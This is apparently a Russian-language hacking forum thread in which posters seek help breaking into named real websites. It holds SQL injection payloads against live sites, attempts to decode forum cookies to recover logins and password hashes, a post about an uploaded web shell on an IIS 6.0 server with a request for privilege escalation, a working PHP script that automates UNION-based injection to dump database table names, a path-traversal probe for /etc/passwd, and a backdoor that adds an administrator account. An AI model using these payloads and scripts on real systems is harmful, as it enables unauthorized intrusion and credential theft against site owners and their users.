Народ, ктонить разъясните ошибку : ERROR Stored procedure execution failed with error! Type: [object Error] Number: -2147217900 Description: ORA-06550: line 1, column 74: PLS-00103: Encountered the symbol ">" when expecting one of the following: . ( ) , * @ % & = - + < / > at in is mod remainder not rem <показатель (**)> <> or != or ~= >= <= <> and or like LIKE2_ LIKE4_ LIKEC_ between || multiset member SUBMULTISET_ ORA-06550: line 1, column 125: PLS-00103: Encountered the symbol "END" Судя по всему Оракл:Р,ругающийся на что-то : POST /remind.asp HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: requiem-online.ru Content-Length: 75 Cookie: ASPSESSIONIDCQDCCAAB=IHFAIINBBIGEAIAPBPHDIJEA;dtm%5F%5Fret%5Fp=Mon+Jun+2+13%3A33%3A10+UTC%2B0400+2008;cur%5Fdtm%5Fret%5Fp=1 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm remind_action=1&usr_email='&[email protected] Сканер выдал полноценную инъекцию,но я ему не верю =_=.Смахивает на какую-то ошибку в приложении) remind_action=1&[email protected]'+%7C%7C+'1%3D0'/**/&[email protected] В том же скрипте,если передать это с определённым количеством кавычек,то выдаст: ADODB.Command error '800a0d5d' Application uses a value of the wrong type for the current operation. /./include/inc_remind.asp, line 26 Но больше ничё не меняется.
http://www.tafy.ro/magazin.asp?action=add&item=32&count=-1' собственно сайт выдает вот это: Microsoft VBScript runtime error '800a000d' Type mismatch: 'CInt' /magazin.asp, line 213
Скажите, а куки с mybb.ru расшифровать как-то возможно? Mnw1OWIxOWVkYTE1MTkxYjRkOGRhMDNlMjg0MDVkZDVmNDcyMjc***** Это какой-то хеш?
Ребят, все равно не могу разобраться с куки... Прочитал статью на форуме. По идее в моем расшифрованном куки дожен быть логин и хеш пароля. Получается полная галиматья. Моя задача именно извлечь логин\пароль. Кто-то это делал нормально? mybb_ru=Nnw2M2JjMWM4OGJjNTQ5YTAwMTFhYWQ5YmJkYmJkYjk1NmNhYjc1N2I2; MG_2445=5 Тестовый юзверь. Логин AARON, пасс 12345 Что бы я не делал я не могу получить не намека на логин и пасс...
нужна помощь по Microsoft-IIS/6.0 добрый день, уважаемое сообщество! срочно нужна помощь в следующем: я кое-что сломал, но не до конца, залил туда шелл, но не могу попасть в некоторые директории и диски, пишет permissions denied мне необходимо поднять права юзера на Microsoft-IIS/6.0 нужна dll-ка или софтина для увеличения привилегий или можно сделать изменением regedit - но нужно узнать где именно в реестре лежит ключ чтоб поднять права, путь до ключа по умолчанию HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrenetVersionWinlogon, но в нашем случае он не там всем заранее спасибо за помощь.
2 Sabe Ну если версия 5 ( если майскуль ) то можно вручную извлечь из всех таблиц всю инфу с БД, также есть много скриптов на пхп и перл для автоматизации этого процесса. В ином случае никак бд не слить
Поищи на секлабе по ключу "повышение привелегий", найдешь много интересного, да, не помешала бы версия форточек, включая SP.
PHP: <?php set_time_limit(0); ignore_user_abort(true); $s=1; $f=39913; $fph = fopen ("result.txt", 'a+'); for ($i=$s; $i<=$f; $i++) { $aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a )+from+information_schema.tables+limit+".$i.",1/*"); $res=null; $pattern ="/:::(.+):::/"; preg_match_all($pattern, $aps, $out); $res=array_values(array_unique($out[0])); fputs ($fph, $res[0]."\r\n"); sleep (5); } fclose ($fph); ?> Незабудь подправить запрос соответсвенно нуждам
а шо значит ошибка 406?пыталась попасть в etc путь вида p=../etc/домен/&f=passwd ,ниче страшного если так и оставить,или лучше и это фильтровать?
нашел там в C:\Inetpub\wwwroot\da***\idq.dll, в которой прописан There will add a Administrators User "iisuser",Its Password is "ab007".If you want to enter cmd.exe shell,please use ispc.exe. как его запустить?
